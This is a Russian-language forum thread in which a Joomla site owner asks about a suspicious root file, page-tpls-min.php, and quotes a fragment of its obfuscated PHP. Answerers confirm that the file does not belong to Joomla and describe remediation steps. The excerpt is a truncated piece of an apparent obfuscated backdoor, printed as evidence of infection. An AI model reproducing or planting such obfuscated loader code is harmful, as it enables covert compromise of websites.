Может ли это быть последствием заражения сайта?

Добрый день

Сайт был ранее подвержен заражению вирусами (старый разработчик кинул падляну), вирусов больше нет, но остались последствия.

Сейчас в корне нашел файл page-tpls-min.php, который содержит 3 500+ символов отборной абракадабры
Вот выдержка из файла:
/**3?c@A=PocL/FB$hlwq='btiabifswqmczetegzb';'jhgvqidzaemcn';*/$eykh='LH6XG|&XPQy53WtYi5+t';'j%+HbgBOS';'2(yF?E:;+';/*kpHHe=%$iR?i|9,2foyAYazP)&B24o4uzhiv|lX))%u,:l;.Va1.uoqE{zb/bPu%EToa!*/$psmn=$psmn.'I%O}o*g52(&D';$mblt='OlW51s1hE,zNF=8F'.'A0wot"pO';$gkli=$gkli.'JE^H!/&;NHlmE';$zkzgbl=$lolpr($mpj,$uwn);$zkzgbl('$kESDNN%-cq.Ww]|]HPDk,$h8s4aE','vK;$6UT/%r+G');}$dnjt;
$wmom='!G$!$5bg+#R0LSj8';$fglhxy='==3G?1SdGzJNGIVywzj/scg7Y*-/_5.kesfOlZ0+1=u'.$mwnatb;$vew=$xjbqf.'!28%vp';

Движок - Joomla

Можно ли удалять файл, т.е. он вообще нужен для движка?
  • Вопрос задан
  • 163 просмотра
Решения вопроса 1
delphinpro
@delphinpro Куратор тега PHP
frontend developer
В корне джумлы такого файла не должно быть. Там только два php файла - index и configuration
Ответ написан
Комментировать
Пригласить эксперта
Ответы на вопрос 2
arutyunov
@arutyunov
Mooza.ru — Делаем сайты
Бекап.
Снесите файл, проверьте, что ничего не отвалилось.

Не отвалилось? Меняйте пароли, доступы, потом проверяйте всю файловую систему, обновляйте Джумлу до актуальной версии, снова проверяйтесь и еще раз поменяйте доступы.
Ответ написан
Комментировать
keslo
@keslo
Вообще похоже.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы